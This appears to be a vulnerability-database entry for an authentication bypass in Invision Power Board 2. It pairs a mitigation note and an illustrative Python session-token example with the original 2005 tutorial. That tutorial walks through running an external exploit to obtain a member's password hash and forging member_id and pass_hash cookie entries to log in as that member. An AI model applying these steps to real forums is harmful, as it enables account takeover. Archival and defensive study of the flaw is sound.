IPB Authentication Bypass
Vendor: Invision Power Board
By: danica jones
CVSS: 7.5 (HIGH)
CWE: 287
Product Name: Invision Power Board
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:invision_power_services:invision_power_board
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2005

Tutorial for the recent exploit released by Petey Beege

This tutorial explains how to bypass authentication in Invision Power Board (IPB) version 2. It exploits a vulnerability in the IPB authentication system that lets an attacker bypass authentication and gain access to the application. The exploit requires access to the Mozilla Firefox cookie file, which is found in the user's profile directory. The attacker adds two entries to the cookie file, one for member_id and one for pass_hash, with values taken from the output of the exploit. Once the entries are added, the attacker can log in to the application using the modified cookie file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the authentication system is secure and that the cookie file is not accessible to unauthorized users.
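
As an added illustration of the mitigation (not code from IPB, the exploit, or the original page), the Python example below contrasts a cookie check in which the member_id and pass_hash pair is itself the credential with a server-side session token that expires and can be revoked. The names `STORED`, `legacy_auth`, `SessionStore` and the `session` cookie are hypothetical, and the legacy check is an assumed model of the behaviour described above.

```python
import hmac
import secrets
import time

# Constructed sample record (member_id -> stored pass_hash); not real data.
STORED = {1: "0123456789abcdef0123456789abcdef"}

def legacy_auth(cookies):
    """Assumed model of the scheme above: the cookie pair is the credential."""
    try:
        member_id = int(cookies.get("member_id", ""))
    except ValueError:
        return None
    stored = STORED.get(member_id)
    presented = cookies.get("pass_hash", "")
    # Whoever holds the stored value passes; nothing expires or can be revoked.
    if stored and hmac.compare_digest(stored.encode(), presented.encode()):
        return member_id
    return None

class SessionStore:
    """Hardened form: opaque random token, server-side state, expiry, revocation."""

    def __init__(self, ttl=1800):
        self.ttl = ttl
        self._sessions = {}  # token -> (member_id, expires_at)

    def issue(self, member_id, now=None):
        """Call only after a successful password check."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (member_id, now + self.ttl)
        return token

    def auth(self, cookies, now=None):
        now = time.time() if now is None else now
        token = cookies.get("session", "")
        entry = self._sessions.get(token)
        if entry is None:
            return None  # unknown token, or only legacy cookies were presented
        member_id, expires_at = entry
        if now >= expires_at:
            del self._sessions[token]  # expired tokens are dropped on sight
            return None
        return member_id

    def revoke_member(self, member_id):
        """Drop every session of a member, e.g. after a password change."""
        stale = [t for t, (m, _) in self._sessions.items() if m == member_id]
        for token in stale:
            del self._sessions[token]
```

With the session store, a value copied out of the member table is useless in a cookie, and a compromised account is recovered by calling `revoke_member` after the password is reset.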
Source

Exploit-DB raw data:

# danica jones <danica6699@gmail.com>

Tutorial for the recent exploit released by Petey Beege.

1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have the LWP::UserAgent Perl module; if not, do this:
     a. perl -MCPAN -e 'shell'
     b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id

ex. inv.pl http://forums.example.com 2 2

Where 2 is the login id and 2 for version 2 of IPB.

4. Open WordPad. Edit Mozilla Firefox's cookie file. Mine is located at

C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt

Add the following entries:

forums.example.com        FALSE        /        FALSE        1148708747        member_id        1
forums.example.com        FALSE        /        FALSE        1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c

Notice the value of member_id and pass_hash taken from the values
generated by the exploit.

5. Fire up Mozilla Firefox and log in to http://forums.example.com

Enjoy!


# milw0rm.com [2005-05-27]